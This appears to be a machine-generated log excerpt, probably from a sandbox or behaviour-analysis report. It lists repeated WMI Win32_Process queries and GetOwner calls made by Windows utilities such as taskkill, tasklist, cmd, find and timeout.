Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
